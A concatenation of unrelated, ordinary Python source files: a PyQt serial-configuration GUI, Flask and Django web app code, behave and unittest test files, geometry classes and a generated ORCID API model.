        self.recordMenu.addAction(self.startrecordingAction)
        self.recordMenu.addAction(self.stoprecordingAction)
        self.recordMenu.addAction(self.exportcsvAction)
        self.recordMenu.addSeparator()
        self.recordMenu.addAction(self.clearrecordAction)
        self.recordMenu.addSeparator()
        self.recordMenu.addAction(self.recordsettingsAction)

        # info menu
        self.menuBar().addAction(self.infoAction)

    def show_info(self):
        QMessageBox.about(
            self, QApplication.applicationName(),
            "%s %s\n"
            "Copyright (c) by %s" %
            (
                QCoreApplication.applicationName(),
                QCoreApplication.applicationVersion(),
                QCoreApplication.organizationName(),
            )
        )

    def load_file(self, filename):
        old_filename = self.filename if self.filename != filename else None
        self.filename = filename

        try:
            with open(filename, 'rb') as f:
                try:
                    self.objectexplorer.model().beginResetModel()
                    self.rootnode.load(bytearray_to_utf8(f.read()))
                    self.objectexplorer.model().endResetModel()
                except ValueError as e:
                    critical(self, "File '%s' is not a valid config file."
                             % filename)
                    logger.error(str(e))
                    if old_filename is not None:
                        self.load_file(old_filename)
                    else:
                        self.filename = None

        except FileNotFoundError as e:
            logger.error(str(e))
            self.filename = None

        self.objectexplorer.refresh()

    def load_settings(self):
        settings = QSettings()

        # window geometry
        try:
            self.restoreGeometry(settings.value(GEOMETRY_SETTING))
        except:
            logger.debug("error restoring window geometry")

        # window state
        try:
            self.restoreState(settings.value(WINDOWSTATE_SETTING))
        except:
            logger.debug("error restoring window state")

        # filename
        self.filename = settings.value(FILENAME_SETTING)
        if self.filename is not None:
            self.load_file(self.filename)

    def save_settings(self):
        settings = QSettings()
        settings.setValue(WINDOWSTATE_SETTING, self.saveState())
        settings.setValue(GEOMETRY_SETTING, self.saveGeometry())
        settings.setValue(FILENAME_SETTING, self.filename)

    def closeEvent(self, event):
        if self.dirty:
            res = QMessageBox.question(
                self,
                QCoreApplication.applicationName(),
                self.tr("Save changes to file '%s'?" %
                        self.filename
                        if self.filename is not None else "unknown"),
                QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel
            )
            if res == QMessageBox.Cancel:
                event.ignore()
                return
            elif res == QMessageBox.Yes:
                self.save_file()

        self.save_settings()

        try:
            self.worker.quit()
        except AttributeError:
            pass

        try:
            self.serial.close()
        except (SerialException, AttributeError):
            pass

    def new(self):
        self.objectexplorer.model().beginResetModel()
        self.rootnode.clear()
        self.objectexplorer.model().endResetModel()

    def send_reset(self):
        jsonstring = json.dumps({"resetpid": 1})
        self.serial.write(bytearray(jsonstring, 'utf-8'))

    def receive_serialdata(self, time, data):
        self.loggingWidget.log_input(data)

        try:
            self.rootnode.from_json(data)
        except ValueError as e:
            logger.error(str(e))

        # refresh widgets
        self.objectexplorer.refresh()
        self.plot.refresh(time)
        if self.recording_enabled:
            self.recordWidget.add_data(time, self.rootnode)

    def send_serialdata(self, node):
        if isinstance(node, JsonItem):
            if self.serial.isOpen():
                s = node.to_json()
                self.serial.write(utf8_to_bytearray(s + '\n'))
                self.loggingWidget.log_output(s.strip())

    def show_serialdlg(self):
        dlg = SerialDialog(self.settings, self)
        dlg.exec_()

    def toggle_connect(self):
        if self.serial.isOpen():
            self.disconnect()
        else:
            self.connect()

    def connect(self):
        # Load port setting
        port = self.settings.get(PORT_SETTING)
        baudrate = self.settings.get(BAUDRATE_SETTING)

        # If no port has been selected before show serial settings dialog
        if port is None:
            if self.show_serialdlg() == QDialog.Rejected:
                return
            port = self.settings.get(PORT_SETTING)
            baudrate = self.settings.get(BAUDRATE_SETTING)

        # Serial connection
        try:
            self.serial.port = port
            self.serial.baudrate = baudrate
            self.serial.open()
        except ValueError:
            QMessageBox.critical(
                self, QCoreApplication.applicationName(),
                self.tr("Serial parameters e.g. baudrate, databits are out "
                        "of range.")
            )
        except SerialException:
            QMessageBox.critical(
                self, QCoreApplication.applicationName(),
                self.tr("The device '%s' can not be found or can not be "
                        "configured." % port)
            )
        else:
            self.worker = SerialWorker(self.serial, self)
            self.worker.data_received.connect(self.receive_serialdata)
            self.worker.start()

            self.connectAction.setText(self.tr("Disconnect"))
            self.connectAction.setIcon(QIcon(pixmap("network-disconnect-3.png")))
            self.serialdlgAction.setEnabled(False)
            self.connectionstateLabel.setText(
                self.tr("Connected to %s") % port)
            self._connected = True
            self.objectexplorer.refresh()

    def disconnect(self):
        self.worker.quit()
        self.serial.close()
        self.connectAction.setText(self.tr("Connect"))
        self.connectAction.setIcon(QIcon(pixmap("network-connect-3.png")))
        self.serialdlgAction.setEnabled(True)
        self.connectionstateLabel.setText(self.tr("Not connected"))
        self._connected = False
        self.objectexplorer.refresh()

    def show_savecfg_dlg(self):
        filename, _ = QFileDialog.getSaveFileName(
            self, self.tr("Save configuration file..."),
            directory=os.path.expanduser("~"),
            filter="Json file (*.json)"
        )

        if filename:
            self.filename = filename
            self.save_file()

    def save_file(self):
        if self.filename is not None:
            config_string = self.rootnode.dump()
            with open(self.filename, 'w') as f:
                f.write(config_string)
            self.dirty = False
        else:
            self.show_savecfg_dlg()

    def show_opencfg_dlg(self):
        # show file dialog
        filename, _ = QFileDialog.getOpenFileName(
            self, self.tr("Open configuration file..."),
            directory=os.path.expanduser("~"),
            filter=self.tr("Json file (*.json);;All files (*.*)")
        )

        # load config file
        if filename:
            self.load_file(filename)

    def refresh_window_title(self):
        s = "%s %s" % (QCoreApplication.applicationName(),
                       QCoreApplication.applicationVersion())
        if self.filename is not None:
            s += " - " + self.filename
        if self.dirty:
            s += "*"
        self.setWindowTitle(s)

    def start_recording(self):
        self.recording_enabled = True
        self.startrecordingAction.setEnabled(False)
        self.stoprecordingAction.setEnabled(True)

    def stop_recording(self):
        self.recording_enabled = False
        self.startrecordingAction.setEnabled(True)
        self.stoprecordingAction.setEnabled(False)

    def export_csv(self):
        filename, _ = QFileDialog.getSaveFileName(
            self, QCoreApplication.applicationName(),
            filter="CSV files(*.csv);;All files (*.*)"
        )

        if filename == "":
            return

        # get current dataframe and export to csv
        df = self.recordWidget.dataframe
        decimal = self.settings.get(DECIMAL_SETTING)
        df = df.applymap(lambda x: str(x).replace(".", decimal))
        df.to_csv(
            filename, index_label="time",
            sep=self.settings.get(SEPARATOR_SETTING)
        )

    def clear_record(self):
        self.recordWidget.clear()

    def show_recordsettings(self):
        dlg = CSVSettingsDialog(self)
        dlg.exec_()

    # filename property
    @property
    def filename(self):
        return self._filename

    @filename.setter
    def filename(self, value=""):
        self._filename = value
        self.refresh_window_title()

    # dirty property
    @property
    def dirty(self):
        return self._dirty

    @dirty.setter
    def dirty(self, value):
        self._dirty = value
        self.refresh_window_title()

    def set_dirty(self):
        self.dirty = True

    # connected property
    @property
    def connected(self):
        return self._connected

# -*- coding: utf-8 -*-
"""


"""
from datetime import datetime, timedelta
import os

from flask import request
from flask import Flask
import pytz

import db
from utils import get_remote_addr, get_location_data


app = Flask(__name__)


@app.route('/yo-water/', methods=['POST', 'GET'])
def yowater():

    payload = request.args if request.args else request.get_json(force=True)
    username = payload.get('username')

    reminder = db.reminders.find_one({'username': username})

    reply_object = payload.get('reply')

    if reply_object is None:

        if db.reminders.find_one({'username': username}) is None:

            address = get_remote_addr(request)
            data = get_location_data(address)
            if not data:
                return 'Timezone needed'

            user_data = {'created': datetime.now(pytz.utc),
                         'username': username}

            if data.get('time_zone'):
                user_data.update({'timezone': data.get('time_zone')})

            db.reminders.insert(user_data)

            return 'OK'

    else:
        reply_text = reply_object.get('text')

        if reply_text == u'Can\'t right now 😖':
            reminder['trigger_date'] = datetime.now(pytz.utc) + timedelta(minutes=15)
        else:

            reminder['step'] += 1
            reminder['trigger_date'] = datetime.now(pytz.utc) + timedelta(minutes=60)

        reminder['last_reply_date'] = datetime.now(pytz.utc)

        db.reminders.update({'username': username},
                            reminder)

        db.replies.insert({'username': username,
                           'created': datetime.now(pytz.utc),
                           'reply': reply_text})

        return 'OK'


if __name__ == "__main__":
    app.debug = True
    app.run(host="0.0.0.0", port=int(os.environ.get("PORT", "5000")))

from django.conf.urls import patterns, include, url
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin

admin.autodiscover()

import views

urlpatterns = patterns('',
    url(r'^pis', views.pis),
    url(r'^words', views.words, { 'titles': False }),
    url(r'^projects', views.projects),
    url(r'^posters', views.posters),
    url(r'^posterpresenters', views.posterpresenters),
    url(r'^pigraph', views.pigraph),
    url(r'^institutions', views.institutions),                    
    url(r'^institution/(?P<institutionid>\d+)', views.institution),                    
    url(r'^profile/$', views.profile),
    url(r'^schedule/(?P<email>\S+)', views.schedule),
    url(r'^ratemeeting/(?P<rmid>\d+)/(?P<email>\S+)', views.ratemeeting),
    url(r'^submitrating/(?P<rmid>\d+)/(?P<email>\S+)', views.submitrating),
    url(r'^feedback/(?P<email>\S+)', views.after),
    url(r'^breakouts', views.breakouts),
    url(r'^breakout/(?P<bid>\d+)', views.breakout),
    url(r'^about', views.about),
    url(r'^buginfo', views.buginfo),
    url(r'^allrms', views.allrms),
    url(r'^allratings', views.allratings),
    url(r'^login', views.login),
    url(r'^logout', views.logout),
    url(r'^edit_home_page', views.edit_home_page),                       
    url(r'^pi/(?P<userid>\d+)', views.pi), # , name = 'pi'),
    url(r'^pi/(?P<email>\S+)', views.piEmail), # , name = 'pi'),
    url(r'^project/(?P<abstractid>\S+)', views.project, name = 'project'),
    url(r'^scope=(?P<scope>\w+)/(?P<url>.+)$', views.set_scope),
    url(r'^active=(?P<active>\d)/(?P<url>.+)$', views.set_active),
    url(r'^admin/', include(admin.site.urls)),
    (r'', include('django_browserid.urls')),
    url(r'^$', views.index, name = 'index'),
    ) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import json

from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions

from behave import *

@step('I share first element in the history list')
def step_impl(context):
    context.execute_steps(u'''
        given I open History dialog
    ''')
    history = context.browser.find_element_by_id("HistoryPopup")
    entries = history.find_elements_by_xpath('.//li[not(@data-clone-template)]')
    assert len(entries) > 0, "There are no entries in the history"
    item = entries[0]
    item.find_elements_by_xpath('.//*[@data-share-item]')[0].click()

@then('the json to share is shown with url "{url}" and contains the following headers')
def step_impl(context, url):
    # Wait for modal to appear
    WebDriverWait(context.browser, 10).until(
        expected_conditions.visibility_of_element_located(
            (By.ID, 'ShareRequestForm')))
    output = context.browser.execute_script("return restman.ui.editors.get('#ShareRequestEditor').getValue();")

    snippet = json.loads(output)

    assert url == snippet["url"], "URL: \"{}\" not in output.\nOutput: {}".format(value, output)
    for row in context.table:
        assert row['key'] in snippet['headers'], "Header {} is not in output".format(row['key'])
        assert row['value'] == snippet['headers'][row['key']], "Header value is not correct. Expected: {}; Actual: {}".format(value, snippet['headers'][name])

@step('I click on import request')
def step_impl(context):
    context.execute_steps(u'''
        given I open History dialog
    ''')
    # Click on import
    context.browser.find_element_by_id('ImportHistory').click()
    WebDriverWait(context.browser, 10).until(
        expected_conditions.visibility_of_element_located(
            (By.ID, 'ImportRequestForm')))

@step('I write a shared request for "{url}"')
def step_impl(context, url):
    req = json.dumps({
        "method": "POST",
        "url": url,
        "headers": {
            "Content-Type": "application/json",
            "X-Test-Header": "shared_request"
        },
        "body": {
            "type": "form",
            "content": {
                "SomeKey": "SomeValue11233",
                "SomeOtherKey": "SomeOtherValue019",
            }
        }
    })
    context.browser.execute_script("return restman.ui.editors.setValue('#ImportRequestEditor', atob('{}'));".format(base64.b64encode(req)))

@step('I click on load import request')
def step_impl(context):
    # Import request
    context.browser.find_element_by_xpath("//*[@id='ImportRequestForm']//input[@value='Import']").click()

#!/usr/bin/env python
"""
This script is used to run tests, create a coverage report and output the
statistics at the end of the tox run.
To run this script just execute ``tox``
"""
import re

from fabric.api import local, warn
from fabric.colors import green, red


if __name__ == '__main__':
    # Kept some files for backwards compatibility. If support is dropped,
    # remove it here
    deprecated_files = '*utils_email*,*utils_log*'

    local('flake8 --ignore=E126 --ignore=W391 --statistics'
          ' --exclude=submodules,migrations,build .')
    local('coverage run --source="django_libs" manage.py test -v 2'
          ' --traceback --failfast --settings=django_libs.tests.settings'
          ' --pattern="*_tests.py"')
    local('coverage html -d coverage'
          ' --omit="*__init__*,*/settings/*,*/migrations/*,*/tests/*,'
          '*admin*,{}"'.format(deprecated_files))
    total_line = local('grep -n pc_cov coverage/index.html', capture=True)
    percentage = float(re.findall(r'(\d+)%', total_line)[-1])
    if percentage < 100:
        warn(red('Coverage is {0}%'.format(percentage)))
    else:
        print(green('Coverage is {0}%'.format(percentage)))

from baroque.entities.event import Event


class EventCounter:
    """A counter of events."""

    def __init__(self):
        self.events_count = 0
        self.events_count_by_type = dict()

    def increment_counting(self, event):
        """Counts an event

        Args:
            event (:obj:`baroque.entities.event.Event`): the event to be counted

        """
        assert isinstance(event, Event)
        self.events_count += 1
        t = type(event.type)
        if t in self.events_count_by_type:
            self.events_count_by_type[t] += 1
        else:
            self.events_count_by_type[t] = 1

    def count_all(self):
        """Tells how many events have been counted globally

        Returns:
            int

        """
        return self.events_count

    def count(self, eventtype):
        """Tells how many events have been counted of the specified type

        Args:
            eventtype (:obj:`baroque.entities.eventtype.EventType`): the type of events to be counted

        Returns:
            int

        """
        return self.events_count_by_type.get(type(eventtype), 0)


import numpy as np


class Surface(object):
    def __init__(self, image, edge_points3d, edge_points2d):
        """
        Constructor for a surface defined by a texture image and
        4 boundary points. Choose the first point as the origin
        of the surface's coordinate system.

        :param image: image array
        :param edge_points3d: array of 3d coordinates of 4 corner points in clockwise direction
        :param edge_points2d: array of 2d coordinates of 4 corner points in clockwise direction
        """
        assert len(edge_points3d) == 4 and len(edge_points2d) == 4

        self.image = image
        self.edge_points3d = edge_points3d
        self.edge_points2d = np.float32(edge_points2d)  # This is required for using cv2's getPerspectiveTransform
        self.normal = self._get_normal_vector()

    def top_left_corner3d(self):
        return self.edge_points3d[0]

    def top_right_corner3d(self):
        return self.edge_points3d[1]

    def bottom_right_corner3d(self):
        return self.edge_points3d[2]

    def bottom_left_corner3d(self):
        return self.edge_points3d[3]

    def distance_to_point(self, point):
        point_to_surface = point - self.top_left_corner3d()
        distance_to_surface = self.normal.dot(point_to_surface)
        return distance_to_surface

    def _get_normal_vector(self):
        """
        :return: the normal vector of the surface. It determined the front side
        of the surface and it's not necessarily a unit vector
        """
        p0 = self.edge_points3d[0]
        p1 = self.edge_points3d[1]
        p3 = self.edge_points3d[3]
        v1 = p3 - p0
        v2 = p1 - p0
        normal = np.cross(v1, v2)
        norm = np.linalg.norm(normal)
        return normal / norm


class Polyhedron(object):
    def __init__(self, surfaces):
        self.surfaces = surfaces


class Space(object):
    def __init__(self, models=None):
        self.models = models or []

    def add_model(self, model):
        assert isinstance(model, Polyhedron)
        self.models.append(model)


class Line2D(object):
    def __init__(self, point1, point2):
        """
        Using the line equation a*x + b*y + c = 0 with b >= 0
        :param point1: starting point
        :param point2: ending point
        :return: a Line object
        """
        assert len(point1) == 2 and len(point2) == 2

        self.a = point2[1] - point1[1]
        self.b = point1[0] - point2[0]
        self.c = point1[1] * point2[0] - point1[0] * point2[1]

        if self.b < 0:
            self.a = -self.a
            self.b = -self.b
            self.c = -self.c

    def is_point_on_left(self, point):
        return self.a * point[0] + self.b * point[1] + self.c > 0

    def is_point_on_right(self, point):
        return self.a * point[0] + self.b * point[1] + self.c < 0

    def is_point_on_line(self, point):
        return self.a * point[0] + self.b * point[1] + self.c == 0

    def get_y_from_x(self, x):
        if self.b == 0:
            return 0.0

        return 1.0 * (-self.c - self.a * x) / self.b

    def get_x_from_y(self, y):
        if self.a == 0:
            return 0.0

        return 1.0 * (-self.c - self.b * y) / self.a

# coding: utf-8

"""
    ORCID Member

    No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)

    OpenAPI spec version: Latest
    
    Generated by: https://github.com/swagger-api/swagger-codegen.git
"""


from pprint import pformat
from six import iteritems
import re


class ContributorOrcid(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    def __init__(self, uri=None, path=None, host=None):
        """
        ContributorOrcid - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
                                  and the value is attribute type.
        :param dict attributeMap: The key is attribute name
                                  and the value is json key in definition.
        """
        self.swagger_types = {
            'uri': 'str',
            'path': 'str',
            'host': 'str'
        }

        self.attribute_map = {
            'uri': 'uri',
            'path': 'path',
            'host': 'host'
        }

        self._uri = uri
        self._path = path
        self._host = host

    @property
    def uri(self):
        """
        Gets the uri of this ContributorOrcid.

        :return: The uri of this ContributorOrcid.
        :rtype: str
        """
        return self._uri

    @uri.setter
    def uri(self, uri):
        """
        Sets the uri of this ContributorOrcid.

        :param uri: The uri of this ContributorOrcid.
        :type: str
        """

        self._uri = uri

    @property
    def path(self):
        """
        Gets the path of this ContributorOrcid.

        :return: The path of this ContributorOrcid.
        :rtype: str
        """
        return self._path

    @path.setter
    def path(self, path):
        """
        Sets the path of this ContributorOrcid.

        :param path: The path of this ContributorOrcid.
        :type: str
        """

        self._path = path

    @property
    def host(self):
        """
        Gets the host of this ContributorOrcid.

        :return: The host of this ContributorOrcid.
        :rtype: str
        """
        return self._host

    @host.setter
    def host(self, host):
        """
        Sets the host of this ContributorOrcid.

        :param host: The host of this ContributorOrcid.
        :type: str
        """

        self._host = host

    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}

        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())

    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()

    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        if not isinstance(other, ContributorOrcid):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Page',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(unique=True, max_length=150)),
                ('slug', models.SlugField(unique=True, max_length=150)),
                ('posted', models.DateTimeField(auto_now_add=True, db_index=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]

from behave import given, when, then
from genosdb.models import User
from genosdb.exceptions import UserNotFound

# 'mongodb://localhost:27017/')


@given('a valid user with values {username}, {password}, {email}, {first_name}, {last_name}')
def step_impl(context, username, password, email, first_name, last_name):
    context.base_user = User(username=username, email=email, password=password, first_name=first_name,
                        last_name=last_name)


@when('I add the user to the collection')
def step_impl(context):
    context.user_service.save(context.base_user)


@then('I check {user_name} exists')
def step_impl(context, user_name):
    user_exists = context.user_service.exists(user_name)
    assert context.base_user.username == user_exists['username']
    assert context.base_user.password == user_exists['password']
    assert context.base_user.email == user_exists['email']
    assert context.base_user.first_name == user_exists['first_name']
    assert context.base_user.last_name == user_exists['last_name']
    assert user_exists['_id'] is not None

@given('I update {username} {field} with {value}')
def step_impl(context, username, field, value):
    user = context.user_service.exists(username)

    if user is not None:
        user[field] = value
        context.user_service.update(user.to_json())
    else:
        raise UserNotFound(username, "User was not found")





@then('I check {username} {field} is {value}')
def step_impl(context, username, field, value):
    user = context.user_service.exists(username)

    if user is not None:
        assert user[field] == value
    else:
        raise UserNotFound(username, "User was not found")




import unittest
from src.data_structures.mockdata import MockData


class TestMockData (unittest.TestCase):

    def setUp(self):

        self.data = MockData()

    def test_random_data(self):
        data = MockData()
        a_set = data.get_random_elements(10)
        self.assertTrue(len(a_set) == 10, "the data should have 10 elements!")

    if __name__ == '__main__':
        unittest.main()
from rest_framework.filters import (
    FilterSet
)
from trialscompendium.trials.models import Treatment


class TreatmentListFilter(FilterSet):
    """
    Filter query list from treatment database table
    """
    class Meta:
        model = Treatment
        fields = {'id': ['exact', 'in'],
                  'no_replicate': ['exact', 'in', 'gte', 'lte'],
                  'nitrogen_treatment': ['iexact', 'in', 'icontains'],
                  'phosphate_treatment': ['iexact', 'in', 'icontains'],
                  'tillage_practice': ['iexact', 'in', 'icontains'],
                  'cropping_system': ['iexact', 'in', 'icontains'],
                  'crops_grown': ['iexact', 'in', 'icontains'],
                  'farm_yard_manure': ['iexact', 'in', 'icontains'],
                  'farm_residue': ['iexact', 'in', 'icontains'],
                  }
        order_by = ['tillage_practice', 'cropping_system', 'crops_grown']

"""
WSGI config for Carkinos project.

It exposes the WSGI callable as a module-level variable named ``application``.

For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""

import os

from django.core.wsgi import get_wsgi_application

os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Carkinos.settings")

application = get_wsgi_application()

from io import BytesIO

from django import forms
from django.http import HttpResponse
from django.template import Context, Template

from braces.views import LoginRequiredMixin
from django.views.generic import DetailView, ListView
from django.views.decorators.http import require_http_methods

from django.contrib import messages
from django.shortcuts import render, redirect
from django.conf import settings

from reportlab.pdfgen.canvas import Canvas

from reportlab.lib.units import inch
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.pagesizes import letter, landscape

from reportlab.platypus import Spacer
from reportlab.platypus import Frame
from reportlab.platypus import Paragraph
from reportlab.platypus import PageTemplate
from reportlab.platypus import BaseDocTemplate

from environ import Env

from members.models import Member


@require_http_methods(['GET', 'POST'])
def member_list(request):
    env = Env()
    MEMBERS_PASSWORD = env('MEMBERS_PASSWORD')

    # handle form submission
    if request.POST:
        pw_form = PasswordForm(request.POST)

        if pw_form.is_valid() and pw_form.cleaned_data['password'] == MEMBERS_PASSWORD:
            request.session['password'] = pw_form.cleaned_data['password']
            return redirect('members:member_list')

        messages.error(request, "The password you entered was incorrect, please try again.")

    # form not being submitted, check password
    if (request.session.get('password') and request.session['password'] == MEMBERS_PASSWORD):
        member_list = Member.objects.all()
        return render(request, 'members/member_list.html', {
            'member_list': member_list,
        })

    # password is wrong, render form
    pw_form = PasswordForm()
    return render(request, 'members/members_password_form.html', {
        'pw_form': pw_form,
    })


class PasswordForm(forms.Form):
    password = forms.CharField(max_length=20,
        widget=forms.PasswordInput(attrs={
            'class': 'form-control',
            'placeholder': 'Enter Password',
    }))


def build_frames(pwidth, pheight, ncols):
    frames = []
    for i in range(ncols):
        f = Frame(x1=(i*((pwidth-30) / ncols)+15),
                  y1=0,
                  width=((pwidth-30) / ncols),
                  height=pheight+2,
                  leftPadding=15,
                  rightPadding=15,
                  topPadding=15,
                  bottomPadding=15,
                  showBoundary=True)
        frames.append(f)
    frames[0].showBoundary=False
    frames[3].showBoundary=False
    return frames

def member_list_pdf(request):
    response = HttpResponse(content_type='application/pdf')
    response['Content-Disposition'] = 'attachment; filename="memberlist.pdf"'

    buffer = BytesIO()

    NCOLUMNS = 4
    PAGE_WIDTH, PAGE_HEIGHT = landscape(letter)

    styles = getSampleStyleSheet()

    ptemplate = PageTemplate(frames=build_frames(PAGE_WIDTH, PAGE_HEIGHT, NCOLUMNS))
    doc = BaseDocTemplate(
        filename=buffer,
        pagesize=landscape(letter),
        pageTemplates=[ptemplate],
        showBoundary=0,
        leftMargin=inch,
        rightMargin=inch,
        topMargin=inch,
        bottomMargin=inch,
        allowSplitting=0,
        title='SSIP209 Members Listing',
        author='Max Shkurygin',
        _pageBreakQuick=1,
        encrypt=None)

    template = Template("""
<font size="14"><strong>{{ member.last_name }}, {{ member.first_name }}</strong></font>
<br/>

{% if member.address or member.town %}
    {{ member.address }}<br/>
    {% if member.town %} {{ member.town }} NY <br/>{% endif %}
{% endif %}

{% if member.homephone %}
(Home) {{ member.homephone }}
<br/>
{% endif %}

{% if member.cellphone %}
(Cell) {{ member.cellphone }}
<br/>
{% endif %}

{% if member.email %}
Email: {{ member.email }}
<br/>
{% endif %}

{% if member.hobbies %}
<strong>My Hobbies</strong>: {{ member.hobbies }}
<br/>
{% endif %}

{% if member.canhelp %}
<strong>I can help with</strong>: {{ member.canhelp }}
<br/>
{% endif %}

{% if member.needhelp %}
<strong>I could use help with</strong>: {{ member.needhelp }}
<br/>
{% endif %}
""")

    content = []
    for member in Member.objects.all():
        context = Context({"member": member})
        p = Paragraph(template.render(context), styles["Normal"])
        content.append(p)
        content.append(Spacer(1, 0.3*inch))

    doc.build(content)

    pdf = buffer.getvalue()
    buffer.close()
    response.write(pdf)
    return response


import time
import multiprocessing
from flask import Flask

app = Flask(__name__)
backProc = None

def testFun():
    print('Starting')
    while True:
        time.sleep(3)
        print('looping')
        time.sleep(3)
        print('3 Seconds Later')

@app.route('/')
def root():

    return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())

@app.route('/kill')
def kill():
    backProc.terminate()
    return 'killed: ' + str(backProc.pid)

@app.route('/kill_all')
def kill_all():
    proc = multiprocessing.active_children()
    for p in proc:
        p.terminate()
    return 'killed all'

@app.route('/active')
def active():
    proc = multiprocessing.active_children()
    arr = []
    for p in proc:
        print(p.pid)
        arr.append(p.pid)

    return str(arr)

@app.route('/start')
def start():
    global backProc
    backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
    backProc.start()
    return 'started: ' + str(backProc.pid)

if __name__ == '__main__':
    app.run()

'''
Created by auto_sdk on 2014-12-17 17:22:51
'''
from top.api.base import RestApi
class SubusersGetRequest(RestApi):
	def __init__(self,domain='gw.api.taobao.com',port=80):
		RestApi.__init__(self,domain, port)
		self.user_nick = None

	def getapiname(self):
		return 'taobao.subusers.get'

# coding: utf-8

import unittest

from config_reader import ConfigReader

class TestConfigReader(unittest.TestCase):

    def setUp(self):
        self.config = ConfigReader("""
            <root>
                <person>
                    <name>山田</name>
                    <age>15</age>
                </person>
                <person>
                    <name>佐藤</name>
                    <age>43</age>
                </person>
            </root>
            """)


    def test_get_names(self):
        self.assertEqual(self.config.get_names(), ['山田', '佐藤'])

    def test_get_ages(self):
        self.assertEqual(self.config.get_ages(), ['15', '43'])

# project/server/tests/test_user.py


import datetime
import unittest

from flask_login import current_user

from base import BaseTestCase
from project.server import bcrypt
from project.server.models import User
from project.server.user.forms import LoginForm


class TestUserBlueprint(BaseTestCase):
    def test_correct_login(self):
        # Ensure login behaves correctly with correct credentials.
        with self.client:
            response = self.client.post(
                "/login",
                data=dict(email="ad@min.com", password="admin_user"),
                follow_redirects=True,
            )
            self.assertIn(b"Welcome", response.data)
            self.assertIn(b"Logout", response.data)
            self.assertIn(b"Members", response.data)
            self.assertTrue(current_user.email == "ad@min.com")
            self.assertTrue(current_user.is_active())
            self.assertEqual(response.status_code, 200)

    def test_logout_behaves_correctly(self):
        # Ensure logout behaves correctly - regarding the session.
        with self.client:
            self.client.post(
                "/login",
                data=dict(email="ad@min.com", password="admin_user"),
                follow_redirects=True,
            )
            response = self.client.get("/logout", follow_redirects=True)
            self.assertIn(b"You were logged out. Bye!", response.data)
            self.assertFalse(current_user.is_active)

    def test_logout_route_requires_login(self):
        # Ensure logout route requres logged in user.
        response = self.client.get("/logout", follow_redirects=True)
        self.assertIn(b"Please log in to access this page", response.data)

    def test_member_route_requires_login(self):
        # Ensure member route requres logged in user.
        response = self.client.get("/members", follow_redirects=True)
        self.assertIn(b"Please log in to access this page", response.data)

    def test_validate_success_login_form(self):
        # Ensure correct data validates.
        form = LoginForm(email="ad@min.com", password="admin_user")
        self.assertTrue(form.validate())

    def test_validate_invalid_email_format(self):
        # Ensure invalid email format throws error.
        form = LoginForm(email="unknown", password="example")
        self.assertFalse(form.validate())

    def test_get_by_id(self):
        # Ensure id is correct for the current/logged in user.
        with self.client:
            self.client.post(
                "/login",
                data=dict(email="ad@min.com", password="admin_user"),
                follow_redirects=True,
            )
            self.assertTrue(current_user.id == 1)

    def test_registered_on_defaults_to_datetime(self):
        # Ensure that registered_on is a datetime.
        with self.client:
            self.client.post(
                "/login",
                data=dict(email="ad@min.com", password="admin_user"),
                follow_redirects=True,
            )
            user = User.query.filter_by(email="ad@min.com").first()
            self.assertIsInstance(user.registered_on, datetime.datetime)

    def test_check_password(self):
        # Ensure given password is correct after unhashing.
        user = User.query.filter_by(email="ad@min.com").first()
        self.assertTrue(
            bcrypt.check_password_hash(user.password, "admin_user")
        )
        self.assertFalse(bcrypt.check_password_hash(user.password, "foobar"))

    def test_validate_invalid_password(self):
        # Ensure user can't login when the pasword is incorrect.
        with self.client:
            response = self.client.post(
                "/login",
                data=dict(email="ad@min.com", password="foo_bar"),
                follow_redirects=True,
            )
        self.assertIn(b"Invalid email and/or password.", response.data)

    def test_register_route(self):
        # Ensure about route behaves correctly.
        response = self.client.get("/register", follow_redirects=True)
        self.assertIn(b"<h1>Register</h1>\n", response.data)

    def test_user_registration(self):
        # Ensure registration behaves correctlys.
        with self.client:
            response = self.client.post(
                "/register",
                data=dict(
                    email="test@tester.com",
                    password="testing",
                    confirm="testing",
                ),
                follow_redirects=True,
            )
            self.assertIn(b"Welcome", response.data)
            self.assertTrue(current_user.email == "test@tester.com")
            self.assertTrue(current_user.is_active())
            self.assertEqual(response.status_code, 200)


if __name__ == "__main__":
    unittest.main()

inside = lambda x, y: 4*x*x+y*y <= 100

def coll(sx, sy, dx, dy):
    m = 0
    for p in range(32):
        m2 = m + 2**(-p)
        if inside(sx + dx * m2, sy + dy * m2): m = m2
    return (sx + dx*m, sy + dy*m)

def norm(x, y):
    l = (x*x + y*y)**0.5
    return (x/l, y/l)

sx, sy = 0, 10.1
